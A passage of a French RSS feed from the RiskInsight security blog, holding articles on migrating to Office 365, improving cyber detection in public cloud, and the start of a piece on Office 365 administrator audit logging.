<li><strong>Authentification directe</strong> <em>(Password Through Authentication</em> ou PTA) : Cette solution apporte la meilleure expérience utilisateur mais a l’inconvénient de faire transiter le mot de passe par Azure AD.</li>
</ul>
<h3>Migrer son référentiel d’identité dans le Cloud, une vision à plus long terme</h3>
<p>Avant ou après migration, il pourra être opportun d&rsquo;envisager de migrer complètement la source des identités dans le Cloud (qu&rsquo;il s&rsquo;agisse d&rsquo;Azure AD ou d&rsquo;une solution tierce), afin de profiter des nouvelles possibilités. Il reste aujourd’hui plusieurs prérequis devant être levés, comme la gestion des imprimantes, des GPO et des terminaux.</p>
<p>&nbsp;</p>
<h2><strong>5/ Ouvrir progressivement les services, pour favoriser une adoption maîtrisée</strong></h2>
<p>Il est toujours <strong>plus facile d&rsquo;ouvrir un nouveau service que de revenir en arrière pour des raisons de sécurité</strong>. Ouvrir massivement les différents services de la suite collaborative a l’avantage d‘offrir un maximum de cas d’usages, mais peut provoquer plusieurs effets de bords.</p>
<p>Tout d’abord, les <strong>services non officiellement supportés</strong> et laissés à la main des utilisateurs à des fins de tests représentent un risque certain. Ils doivent être configurés et durcis. Dans certains cas, il peut même être préférable de désactiver les licences correspondantes.</p>
<p>Ensuite, un lancement maîtrisé des outils permettra de <strong>maîtriser les coûts</strong> pendant les premiers mois ou années de la transition. En effet, les licences Microsoft représentant une certaine charge, il est possible d’optimiser les licences non utilisées.</p>
<p>La <strong>conduite du changement</strong> est également un aspect clé à considérer ; pour favoriser l’expérience utilisateur certes, mais également pour favoriser sécurité des données. Il est essentiel d’avoir une feuille de route et un parcours utilisateur clairement définis. Une adoption accompagnée permettra de poser les bases d’une gouvernance propre des espaces partagés et des données (tant en termes d’exposition que de protection).</p>
<p>Il sera utile d’envisager de créer une <strong>communauté d’évangélistes et d’utilisateurs</strong> afin de conserver une dynamique dans l’adoption des nouvelles fonctionnalités apportées par Microsoft. Un système de <em>uservoice</em> pourrait être un atout ; l’idéal étant d’être à l’écoute des besoins des utilisateurs et prioriser en fonction les prochaines ouvertures.</p>
<p>&nbsp;</p>
<h2>6/ Les licences, nerf de la guerre d’Office 365 et de la sécurité</h2>
<p>Les solutions SaaS sont généralement soumises à un modèle de licences facturées mensuellement. Le choix des licences Microsoft 365 doit être le fruit une réflexion globale. Il ne peut rester l’apanage des équipes workplace, et être déterminé par le seul besoin de collaboration et de communication.</p>
<p>En effet, le choix du niveau de <em>licensing</em> conditionnera la <strong>stratégie de sécurisation du tenant</strong>. Ce choix aura plus largement des impacts sur la <strong>stratégie de sécurisation de l’environnement de travail</strong>.</p>
<blockquote><p>Microsoft se positionne de plus en plus comme <em>challenger</em> des fournisseurs de solutions sécurité, étant le seul à proposer une suite aussi complète.</p></blockquote>
<p>Le <em>licensing</em> des options sécurité est à traiter dès le début du projet, et à chaque renouvellement. Il sera moins onéreux d’inclure un paquet de licences dès le départ que de commander en urgence des licences AAD P1 pour en urgence du MFA.</p>
<p>Dans cette stratégie à définir, il pourra être opportun de cibler des <em>personae</em> pour <strong>adapter les exigences de sécurité</strong> à leur profil (VIP, admin, population médicale, etc.), via une approche par les risques.</p>
<p>&nbsp;</p>
<p><em>Cette démarche, présentée ici pour Office 365, peut être généralisée à tout service SaaS (Solution as a Service), voire service IaaS (Infrastructure as a Service) ou PaaS (Platform as a Service).</em></p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2020/07/comment-migrer-son-environnement-de-travail-sereinement-vers-office-365/">Comment migrer son environnement de travail sereinement vers Office 365</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Comment améliorer votre detection cyber en migrant dans le Cloud</title>
		<link>https://www.riskinsight-wavestone.com/2020/07/how-to-improve-your-cyber-detection-by-moving-to-the-cloud/</link>
		
		<dc:creator><![CDATA[AdRi3nM3rlieR]]></dc:creator>
		<pubDate>Sun, 12 Jul 2020 16:28:00 +0000</pubDate>
				<category><![CDATA[Cloud & Next-Gen IT Security]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[détection]]></category>
		<category><![CDATA[fournisseur]]></category>
		<category><![CDATA[SIEM]]></category>
		<guid isPermaLink="false">http://riskinsight-prepro.s189758.zephyr32.atester.fr/?p=16596</guid>

					<description><![CDATA[<p>Le Cloud est sur toutes les lèvres, surtout en ces temps inhabituels de travail à distance. De nombreuses organisations revoient la manière avec laquelle elles conçoivent et mettent en œuvre leurs activités afin de passer avec succès vers des fournisseurs...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2020/07/how-to-improve-your-cyber-detection-by-moving-to-the-cloud/">Comment améliorer votre detection cyber en migrant dans le Cloud</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Le Cloud est sur toutes les lèvres, surtout en ces temps inhabituels de travail à distance. De nombreuses organisations revoient la manière avec laquelle elles conçoivent et mettent en œuvre leurs activités afin de passer avec succès vers des fournisseurs de services cloud (CSP). Mais cette tendance « Move to Cloud » pourrait aussi être l’occasion pour les équipes de sécurité de reprendre le contrôle et de détecter les incidents mieux que jamais !</p>
<p>L&rsquo;année dernière, j&rsquo;ai eu la chance de travailler avec différentes organisations dans leur transformation du Cloud, et chacune d&rsquo;elles a fourni à notre équipe de consultants Wavestone des idées et des leçons clés sur ce que les systèmes de détection basés sur le Cloud peuvent et ne peuvent pas apporter à une organisation.</p>
<p>Au cours de cette année, j’ai eu la chance de travailler avec différentes organisations dans leur transformation Cloud, et chacune d’entre elles a fourni à notre équipe de consultants Wavestone des retours d’expériences et des leçons clés sur ce que les systèmes de détection basés sur le Cloud peuvent et ne peuvent pas apporter à une organisation.</p>
<p><em>Pour cet article, gardez à l’esprit que nous <u>considérerons tout changement de configuration conduisant à une dégradation du niveau de sécurité comme un incident</u>. Bien qu’il ne corresponde peut-être pas à la définition exacte et habituelle d’un incident de sécurité, la mauvaise configuration d’un service public cloud (où les ressources et les données peuvent être directement accessibles par Internet) est</em> <em>un problème trop grave pour ne pas donner lieu à une alerte immédiate sur la sécurité du système d’information.</em></p>
<h2>Embrassez les victoires rapides</h2>
<p>Lorsque vous utilisez le Public Cloud des principaux fournisseurs (Amazon Web Services, Microsoft Azure et Google Cloud Platform), il est assez facile d’activer les fonctionnalités de détection natives et de d’obtenir une capacité de détection basique mais efficace.&nbsp;<strong>La plupart des éditeurs fournissent une plateforme de</strong> <strong>sécurité centrale</strong> qui vous permettra de détecter <strong>les erreurs</strong> <strong>de configuration</strong> &nbsp;sur l’infrastructure que vous avez déployée, <strong>d’évaluer votre niveau de</strong> <strong>conformité</strong> par rapport à une norme donnée et de <strong>lever certaines</strong> <strong>alertes</strong> lorsque les incidents les plus typiques se produiront (voir plus loin). Il n’y a pratiquement aucune raison de passer sur ces fonctionnalités, qui sont parfois gratuites à activer (que ce soit pour un essai ou de manière permanente).</p>
<figure id="post-14768 media-14768" class="align-center"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-14768" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2020/12/1.png" alt="" width="867" height="611" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2020/12/1.png 867w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/12/1-271x191.png 271w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/12/1-55x39.png 55w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/12/1-768x541.png 768w" sizes="auto, (max-width: 867px) 100vw, 867px" /></figure>
<p>En outre, la journalisation est quasiment un non-problème dans votre feuille de route de sécurité. Les fournisseurs de cloud vous permettent généralement de diffuser les journaux de vos machines virtuelles (par l’intermédiaire d’agents), de vos composants PaaS (via une poignée de clics, ou de quelques paramètres dans vos modèles d’Infrastructure as Code) et du plan de gestion (management plane) de votre abonnement (souvent activé par défaut). Cela permet à votre équipe de sécurité de comprendre rapidement l’activité en cours sur la plate-forme et de commencer à construire sur la base des journaux pour obtenir quelques alertes. En outre, certains fournisseurs de cloud possèdent des systèmes SIEM (tels que Azure Sentinel) prêts à être branchés via des connecteurs pour les appliances et les sources de données externes. Ces systèmes SIEM analysent les journaux et retire &nbsp;une partie du travail lourd nécessaire lors de la mise en place de la journalisation.</p>
<h2>Saisissez l&rsquo;occasion d&rsquo;améliorer la sécurité dès maintenant</h2>
<p>Une fois que vous avez appris les bases des outils natifs de détection Cloud, il est temps de construire votre propre expertise pour pouvoir compter sur vos propres outils ! Vous pouvez également vous appuyer sur des solutions tierces telles que les solutions de gestion de la posture de sécurité dans les Cloud (CSPM) et les configurer de manière à couvrir vos besoins.</p>
<p>Comme indiqué ci-dessus, les fonctionnalités natives des fournisseurs de services Cloud offrent quelques alertes de base qui peuvent aller loin. Avec AWS Guard Duty, vous pouvez détecter la compromission des jetons d&rsquo;accès AWS EC2 ou un accès anormal aux seaux S3. Azure Security Center vous avertira lorsqu&rsquo;une activité potentiellement malveillante est détectée sur une machine virtuelle, ou lorsque les comptes Azure AD sont susceptibles d&rsquo;être pris en charge&#8230; Si vous devez être capable de détecter rapidement des attaques, il existe un moyen d&rsquo;exploiter les alertes natives et prêtes à l&#8217;emploi disponibles (bien que certaines d&rsquo;entre elles puissent nécessiter la licence premium après un essai gratuit).</p>
<p>L&rsquo;un des principaux avantages de la détection du Cloud est que vous pouvez agir immédiatement en y remédiant automatiquement ! Par exemple, les erreurs de configuration sont une réelle source de préoccupation pour les équipes de sécurité, comme en témoignent les téraoctets de données qui ont fui par des seaux S3 accidentellement exposés. Alors pourquoi ne pas reconfigurer tout seau exposé, à moins qu&rsquo;il n&rsquo;ait été spécifiquement défini dans une « liste d&rsquo;autorisation » ? L&rsquo;automatisation vous permettra de détecter le modèle d&rsquo;exposition, de lancer une fonction sans serveur qui corrigera la mauvaise configuration et pourrait même avertir le propriétaire de la ressource ou l&rsquo;équipe de sécurité.</p>
<figure id="post-14770 media-14770" class="align-center"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-14770" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2020/12/2.png" alt="" width="831" height="681" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2020/12/2.png 831w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/12/2-233x191.png 233w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/12/2-48x39.png 48w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/12/2-768x629.png 768w" sizes="auto, (max-width: 831px) 100vw, 831px" /></figure>
<p>Cela peut être fait pour une mauvaise configuration, mais aussi pour une activité malveillante : si vous détectez qu&rsquo;un jeton EC2 est volé dans les métadonnées d&rsquo;une instance, vous pouvez temporairement lui retirer ses droits d&rsquo;accès. Si vous constatez que la journalisation est désactivée, réactivez-la et verrouillez les comptes d&rsquo;utilisateurs responsables. <strong>Cela vous permettra de réagir plus rapidement aux incidents de sécurité.</strong></p>
<p>Bien entendu, vous devez encore travailler sur le processus global de gestion des incidents : à la fois sur la manière d&rsquo;éviter la mauvaise configuration des services (par la formation des développeurs et les contrôles dans les canaux CICD s&rsquo;ils existent) et sur la manière de les gérer une fois qu&rsquo;ils se produisent (le modèle de fonctionnement est abordé plus loin).</p>
<h2>Se rapprocher de l&rsquo;entreprise et de l&rsquo;amélioration continue</h2>
<p>Le passage au Cloud est généralement un moment où les applications et les charges de travail devront à nouveau passer par un examen de sécurité pour s&rsquo;assurer que l&rsquo;architecture et la conception sont solides et sûres. Mais<strong> c&rsquo;est aussi l&rsquo;occasion de rendre la détection de sécurité plus pertinente pour l&rsquo;application.</strong></p>
<figure id="post-14766 media-14766" class="align-center"><img loading="lazy" decoding="async" class="size-full wp-image-14766 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2020/12/3.png" alt="" width="901" height="664" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2020/12/3.png 901w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/12/3-259x191.png 259w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/12/3-53x39.png 53w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/12/3-768x566.png 768w" sizes="auto, (max-width: 901px) 100vw, 901px" /></figure>
<p>Pour que cela compte, <strong>mon conseil serait le suivant:</strong></p>
<ul>
<li><strong>Passer par le processus de « Service Enablement » pour les nouveaux services : </strong>comme le passage au cloud permet aux équipes commerciales et informatiques d&rsquo;utiliser des centaines de nouvelles fonctionnalités et de nouveaux composants, il est important de réunir les architectes et les équipes de sécurité pour évaluer les principaux risques pour chaque nouvelle technologie, trouver des contre-mesures pour limiter ces risques et commencer à réfléchir aux alertes qui devront être mises en œuvre dans le SIEM ;</li>
<li><strong>Construire un catalogue d&rsquo;alerte pour chaque scénario et composant de risque typique</strong>, la logique de l&rsquo;alerte étant déjà prédéfinie et seules les spécificités de l&rsquo;entreprise devant être personnalisées. Le « time to market » de la supervision devrait également diminuer, car une bonne partie des composants utilisés pour les opérations dans le Cloud est commune à la plupart des applications (machines virtuelles, bases de données, applications et fonctions sans serveur, systèmes de découplage) ;</li>
<li><strong>Tenez-vous au courant des attaques </strong>liées au Cloud afin de comprendre les dernières vulnérabilités et les chemins empruntés par les attaquants, et intégrez-les dans vos systèmes de détection.</li>
</ul>
<p><strong>Toutes ces spécificités applicatives doivent s&rsquo;ajouter aux alertes transversales couvrant les fonctions essentielles de votre Cloud</strong> (IAM, mise en réseau, zones d&rsquo;atterrissage, etc.). Pour vous aider à mettre en place cette capacité de détection du noyau, vous pouvez évidemment compter sur notre équipe, mais je vous recommande également de vous renseigner sur la communauté CloudSec, qui ne cesse de s&rsquo;agrandir et qui partage son expertise en permanence grâce à des outils open-source (comme cette <a href="https://github.com/toniblyx/my-arsenal-of-aws-security-tools">vue consolidée&nbsp;</a>) ou sur des plateformes en direct et en ligne (comme le Forum sur la sécurité dans le Cloud et son premier&nbsp;<a href="https://fwdcloudsec.org/index.html#intro"><strong>Fwd:CloudSec</strong></a>&nbsp;conférence cette année).</p>
<h2>Mais tout n&rsquo;est pas facile !</h2>
<p>D&rsquo;après tout ce qui précède, il peut sembler facile d&rsquo;obtenir une compétence de détection et de réaction d&rsquo;un Cloud solide. Cependant, certains défis restent à relever.</p>
<p>Le premier qui vient à l&rsquo;esprit est la tarification. Souvent proposé comme argument de vente pour les programmes Move to Cloud, <strong>il n&rsquo;est pas aussi facile qu&rsquo;il y paraît d&rsquo;estimer avec précision le prix que votre fournisseur vous fera payer pour les détections Cloud</strong>. Au fil des ans, de nombreuses solutions de sécurité des CSP sont passées à une tarification basée sur les composants pour les IaaS et à une tarification basée sur les transactions pour les composants PaaS. Le stockage des journaux et les alertes sont parfois encore plus complexes, car certaines solutions vous factureront en fonction du transit et de l&rsquo;agrégation des journaux, tandis que d&rsquo;autres vous factureront le nombre d&rsquo;évaluations par rapport aux alertes que vous avez lancées. Un travail important est nécessaire pour déterminer un budget réel et ne pas faire faillite.</p>
<p>Le deuxième point essentiel est de <strong>comprendre ce que votre fournisseur offre et ce qu&rsquo;il n&rsquo;offre pas en termes de détection</strong>. Si la plupart des solutions prétendront résoudre tous vos problèmes d&rsquo;un seul coup, c&rsquo;est malheureusement loin d&rsquo;être le cas. Et pour chaque cas d&rsquo;utilisation de la sécurité, il faut savoir si l&rsquo;option gratuite, si elle existe, vous convient, si l&rsquo;option premium est nécessaire ou si vos équipes de sécurité peuvent se débrouiller seules. <strong>De manière réaliste, vous devrez commencer par l&rsquo;option native, jusqu&rsquo;à ce que votre équipe de sécurité soit suffisamment mature, en termes de Cloud, pour passer à un processus fait maison.</strong></p>
<p>En outre, et c&rsquo;est peut-être l&rsquo;aspect le plus important, <strong>vous devez concevoir un modèle d&rsquo;exploitation qui vous permettra de travailler avec plusieurs abonnements, plusieurs équipes/entreprises et éventuellement plusieurs fournisseurs de Cloud</strong>. De plus en plus d&rsquo;organisations parallélisent leurs opérations en choisissant différents CSP pour différents cas d&rsquo;utilisation, ce qui entraîne une complexité accrue pour les équipes de sécurité &#8211; car elles doivent gérer des incidents sur différentes plateformes, les responsabilités étant réparties entre les DevOps, les SecOps et les équipes sur site. Cela sera d&rsquo;autant plus difficile qu&rsquo;une mauvaise configuration entraînera des risques de sécurité immédiats et qu&rsquo;il faudra choisir entre les opérations et la sécurité. En l&rsquo;absence d&rsquo;une division solide des tâches entre tous les fournisseurs et toutes les équipes, il y a de fortes chances qu&rsquo;une petite erreur de configuration se transforme en une fuite de données importante.</p>
<p>Enfin, n&rsquo;oubliez pas que la surveillance de vos applications dans le Cloud peut également créer des risques. Outre le verrouillage des fournisseurs, vous pouvez perdre toutes les fonctions de sécurité ainsi que vos applications si tout se trouve sous le même plan de gestion. Si les droits d&rsquo;administration globale du locataire SIEM sont repris par un attaquant, il aura toute liberté d&rsquo;affecter les ressources sous-jacentes (c&rsquo;est-à-dire d&rsquo;effacer les journaux, de désactiver les alertes ou de supprimer les capacités de correction). Il vaut la peine d&rsquo;y réfléchir avant d&#8217;empiler votre SIEM et vos applications critiques sous le même toit.</p>
<p>Pour résumer, en fin de compte :</p>
<ul>
<li><strong>Attrapez les fruits qui pendent : </strong>votre fournisseur de Cloud vous aidera à collecter et à consolider les bûches facilement. Il n&rsquo;y a pratiquement plus d&rsquo;obstacles techniques pour ne plus utiliser les bûches. En outre, activez les fonctions de sécurité de base fournies par votre fournisseur de services dans le Cloud pour détecter les attaques les plus évidentes.</li>
<li><strong>Développez votre maturité en matière de Cloud avec des équipes de Cloud : </strong>Le mouvement Cloud a poussé les équipes commerciales et informatiques (SecDevOps) à travailler plus étroitement que jamais. Adoptez cette philosophie en comprenant mieux les besoins des entreprises en termes de sécurité, en personnalisant les alertes et en automatisant votre réponse pour permettre à votre capacité d&rsquo;évoluer.</li>
</ul>
<ul>
<li><strong>Optimiser les coûts et les modèles de fonctionnement pour exceller : </strong>La virtualisation a facilité de nombreux aspects techniques pour les équipes, mais les processus peuvent être difficiles à adapter. Veillez à concevoir avec soin votre modèle d&rsquo;exploitation de détection/réponse aux incidents pour vous assurer que toutes vos applications et tous vos fournisseurs de services dans le Cloud sont couverts. Enfin, pensez à l&rsquo;optimisation des coûts lorsqu&rsquo;il s&rsquo;agit de la gestion des logs !</li>
</ul>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2020/07/how-to-improve-your-cyber-detection-by-moving-to-the-cloud/">Comment améliorer votre detection cyber en migrant dans le Cloud</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Journalisation d’Office 365 : un cas concret avec les administrateurs</title>
		<link>https://www.riskinsight-wavestone.com/2020/03/journalisation-doffice-365-un-cas-concret-avec-les-administrateurs/</link>
		
		<dc:creator><![CDATA[GEneviEveLardon]]></dc:creator>
		<pubDate>Tue, 24 Mar 2020 14:38:43 +0000</pubDate>
				<category><![CDATA[Cloud & Next-Gen IT Security]]></category>
		<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[administration]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Digital Workplace]]></category>
		<category><![CDATA[logs]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[O365]]></category>
		<category><![CDATA[Office 365]]></category>
		<category><![CDATA[security architecture]]></category>
		<category><![CDATA[SOC]]></category>
		<category><![CDATA[supervision]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=12788</guid>

					<description><![CDATA[<p>Les migrations vers la plateforme de Digital Workplace de Microsoft, Office 365, (solution majoritairement adoptée par les grands comptes français) sont bien avancées, voire terminées. L’heure est maintenant à l’amélioration des processus, mais également, et surtout enfin, à la sécurisation....</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2020/03/journalisation-doffice-365-un-cas-concret-avec-les-administrateurs/">Journalisation d’Office 365 : un cas concret avec les administrateurs</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Les migrations vers la plateforme de Digital Workplace de Microsoft, Office 365, (solution majoritairement adoptée par les grands comptes français) sont bien avancées, voire terminées. L’heure est maintenant à l’amélioration des processus, mais également, et surtout enfin, à la sécurisation.</p>
<p>La sécurisation d’Office 365 passe par de <a href="https://www.riskinsight-wavestone.com/2019/10/office-365/">nombreuses thématiques à adresser</a>, dont la nécessité d’être en capacité de tracer les actions, afin de détecter des comportements illicites ou de remonter à la cause d’un incident.</p>
<p>En France, de nombreuses entreprises ont cependant des difficultés pour consolider les logs et définir des cas d’usages de supervision. La maîtrise de la journalisation doit être au cœur de cette démarche.</p>
<p>&nbsp;</p>
<h2>La supervision des actions d’administration, une nécessité</h2>
<p style="text-align: justify;">Pour ce décryptage sur la journalisation, prenons le cas des administrateurs de la plateforme.</p>
<p style="text-align: justify;">Comme pour les autres solutions SaaS (Google Cloud Platform, Salesforce, etc.), <strong>l’atteinte à l’intégrité ou à la confidentialité des données à la suite d’une erreur ou d’une action malveillante d’un administrateur de l’entreprise se retrouve parmi les risques majeurs identifiés par nos clients</strong></p>
<p style="text-align: justify;">Par définition, <strong>les administrateurs Office 365 possèdent des privilèges élevés</strong> :</p>
<ul>
<li>Configuration des différents services – ou <em>workloads – </em>et des API ;</li>
<li>Gestion des permissions sur les OneDrive et les boîtes mails des utilisateurs ;</li>
<li>Gestion du cycle de vie des espaces de collaboration.</li>
</ul>
<p style="text-align: justify;">Il est facile d’imaginer les <strong>conséquences désastreuses qui pourraient résulter d’une utilisation malveillante ou non maîtrisée</strong> de ces privilèges. En effet, des paramètres tels que le partage à l’externe de SharePoint Online, les autorisations des API ou la configuration de la messagerie pourraient introduire des vecteurs de fuite de données significatifs.</p>
<p style="text-align: justify;"><strong>Les bonnes pratiques du SI on-premise</strong> (cycle de vie, principe de moindre privilège, segmentation des droits, authentification forte, <em>just-in-time access</em> etc.) <strong>doivent aussi être appliquées sur le Cloud</strong>. Le Cloud aussi doit être maîtrisé et contrôlé.</p>
<p style="text-align: justify;">Cependant, l’implémentation des bonnes pratiques  bien que nécessaire, ne suffisent pas. En effet, elles ne permettent pas de s’assurer qu’un administrateur ne réalise pas des actions diminuant le niveau de sécurité ou des actions illicites. On peut donc naturellement se demander <strong>comment il serait possible d’auditer les actions effectuées et de lever des alertes le cas échéant. </strong></p>
<p style="text-align: justify;">Quels sont les moyens fournis par Microsoft ? Comment prévenir qu’une personne malveillante n’efface ses traces (ce qui rendrait une attaque plus difficile à détecter et à reconstituer) ?</p>
<p style="text-align: justify;">Afin d’illustrer les différentes possibilités, nous allons suivre les quatres exemples ci-dessous :</p>
<p>&nbsp;</p>
<figure id="post-12797 media-12797" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-12797 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2020/03/Image3.png" alt="" width="1750" height="433" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2020/03/Image3.png 1750w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/03/Image3-437x108.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/03/Image3-71x18.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/03/Image3-768x190.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/03/Image3-1536x380.png 1536w" sizes="auto, (max-width: 1750px) 100vw, 1750px" /></figure>
<p style="text-align: center;"><em>Figure 1 &#8211; Exemple d&rsquo;actes d&rsquo;administration suspects</em></p>
<p>&nbsp;</p>
<h2>Quels journaux sont disponibles ?</h2>
<h3>Unified Audit Logs : journalisation unifiée des différents services</h3>
<p style="text-align: justify;">Pour des raisons historiques et techniques, Office 365 possède nativement plusieurs sources de journaux : <strong>Unified Audit Logs</strong>, <strong>Exchange Logs</strong> et <strong>Azure Logs</strong>. Ces sources sont complémentaires et doivent être analysées conjointement afin d’avoir une vision exhaustive des actions d’administration réalisées.</p>
<p style="text-align: justify;">La source de logs la plus couramment citée et utilisée sont les « <a href="https://docs.microsoft.com/fr-fr/microsoft-365/compliance/search-the-audit-log-in-security-and-compliance">Unified Audit Logs</a> ». Ces logs <strong>centralisent les traces des utilisateurs et celles des administrateurs, pour l’ensemble des services de la plateforme </strong>: SharePoint Online, Azure AD, Exchange Online, Teams, Power Platforms. <strong>Microsoft intègre progressivement les différentes sources et continue à rajouter des nouveaux logs</strong>.</p>
<p style="text-align: justify;"><em>Pour revenir à nos exemples concrets, les logs intéressants</em><em> sont :</em></p>
<ul>
<li><em>Modification de la Politique de partage à l’externe de SharePoint Online : SharingPolicyChanged</em></li>
<li><em>Attribution de droits à un OneDrive : SiteCollectionAdminAdded</em></li>
<li><em>Attribution de droits à une boîte mail : AddMailboxPermission</em></li>
<li><em>Modification d’un rôle d’administration : AddMembertoRole</em></li>
</ul>
<p style="text-align: justify;">Ces logs sont accessibles et exportables via les Centres de Conformité et de Sécurité, les API Office 365 Management et PowerShell (via la cmdlet <a href="https://docs.microsoft.com/fr-fr/powershell/module/exchange/policy-and-compliance-audit/search-unifiedauditlog?view=exchange-ps">Search-UnifiedAuditLog</a>). Notons que la <strong>journalisation doit être activée</strong> via le Centre de Conformité ou via PowerShell afin de pouvoir enregistrer des logs et permettre la recherche.</p>
<p style="text-align: justify;">Il est possible de <strong>configurer directement des alertes liées à l’occurrence de certains logs</strong> dans les Centres de Sécurité et de Conformité.</p>
<h3>Exchange Logs : journalisation de l’infrastructure de messagerie</h3>
<p style="text-align: justify;">La deuxième source de logs intéressante sont les « <a href="https://docs.microsoft.com/fr-fr/microsoft-365/compliance/enable-mailbox-auditing">Exchange Logs</a> ». Ces logs fournissent des <strong>informations quant aux actions d’utilisation et d’administration réalisées sur le service Exchange Online ainsi que sur les boîtes aux lettres personnelles ou partagées</strong>. Deux typologies de journaux peuvent être distinguées :</p>
<ul>
<li style="text-align: justify;"><strong>Administrator Audit Logs</strong>: Logs d’administration du service ou d’une boîte aux lettres (ex : modification des permissions d’un utilisateur, modification de la durée de rétention de conservation des journaux d’une boîte aux lettres etc.)</li>
<li style="text-align: justify;"><strong>Mailbox Audit Logs </strong>: Logs d’utilisation d’une boîte aux lettres par l’utilisateur principal, un utilisateur délégué ou un administrateur de service (ex : accès à la boîte aux lettres, envoi d’un mail à la place de l’utilisateur principal, déplacement d’un élément dans un dossier, suppression définitive, etc.)</li>
</ul>
<p style="text-align: justify;"><em>Pour revenir à nos exemples concrets, les logs qui vont nous intéresser ici sont : </em></p>
<ul style="text-align: justify;">
<li><em>Attribution de droits à une boîte aux lettres : AddMailboxPermission</em></li>
<li><em>Accès à un dossier ou à une boîte aux lettres : FolderBind (non activé par défaut): </em></li>
<li><em>Accès à un mail : MailItemAccessed (uniquement pour les utilisateurs ayant une licence E5)</em></li>
</ul>
<p><strong>Pour aller plus loin avec les Administrator Audit Logs</strong></p>
<p style="text-align: justify;">Les Administrator Audit Logs sont générés pour toute action d’administration Exchange pouvant être reliée à une cmdlet PowerShell autre que Get, Search ou Test. Ces logs sont liés aux Unified Logs et peuvent être exploités dans le Centre d’Administration Exchange, les Centres de Sécurité et de Conformité, les API Office 365 Management et PowerShell.</p>
<p><strong>Pour aller plus loin avec les Mailbox Audit Logs </strong></p>
<p style="text-align: justify;">Les Mailbox Audit Logs sont la seule catégorie de logs à être configurable (périmètre et granularité). Ces logs permettent de tracer les actions réalisées par un <em>owner </em>(propriétaire), un <em>delegate</em> (utilisateur ayant des permissions) et d’un <em>admin</em> (accès via les outils eDiscovery).</p>
<p style="text-align: justify;">Depuis Janvier 2019, la journalisation des Mailbox Audit Logs est activée par défaut pour l’ensemble des locataires Office 365. A date, si la journalisation est activée par défaut, l’ensemble des boîtes aux lettres sont auditées (même si le paramètre « -AuditDisabled » est à « True »). La seule façon de ne pas journaliser les actions d’une boîte mail est d’implémenter une règle de by-pass avec « Set-MailboxAuditBypassAssociation ».</p>
<p style="text-align: justify;">Il faut toutefois noter que certaines actions ne sont pas auditées par défaut, comme par exemple l’accès d’un <em>delegate </em>ou d’un <em>admin</em> à une boite mail d’un utilisateur. Il est par conséquence primordial d’analyser les journaux à activer, lors de la configuration initiale du service.</p>
<p style="text-align: justify;">Selon le niveau de licences et la configuration, ces logs peuvent être liés aux Unified Logs et être exploités dans le Centre d’Administration Exchange, les API Office 365 Management et PowerShell ou les Centres de Sécurité et de Conformité.</p>
<h3 style="text-align: justify;">Azure Logs et Rapports : journalisation d’Azure Active Directory</h3>
<p style="text-align: justify;">La dernière source de logs, mais pas la moins importante, sont les « <a href="https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/plan-monitoring-and-reporting">Azure AD logs</a> ». Ces logs permettent de fournir des <strong>traces complètes pour la brique d’identité d’Office 365 ainsi que sur les actions d’administration associées</strong>. Plusieurs catégories de journaux et de rapports sont disponibles :</p>
<ul>
<li style="text-align: justify;"><strong>Azure Audit Logs</strong>: Logs d’administration de la brique d’identification ou de modification des éléments (ex : attribution du rôle « SharePoint Administrator », création d’un utilisateur ou d’un groupe de sécurité, autorisation d’une API, configuration des utilisateurs invités, etc.)</li>
<li style="text-align: justify;"><strong>Azure Sign-in Logs</strong>: Logs de connexion à un service Office 365 (ou à des applications / ) avec des informations sur la chaîne de connexion (ex : protocole, adresse IP, terminal, etc.)</li>
<li style="text-align: justify;"><strong>Risky Sign-in</strong>: Rapports de connexion avec des indicateurs liés à des connexions suspectes.</li>
</ul>
<p style="text-align: justify;">Ces logs et rapports sont accessibles et exportables via le portal Azure, les API Graph ou Azure Management et PowerShell. Certains des logs directement liés à Office 365 se retrouvent aussi dans les Unified Audit Logs.</p>
<p style="text-align: justify;"><em>Pour revenir à nos exemples concrets, les logs intéressants</em><em> sont :</em></p>
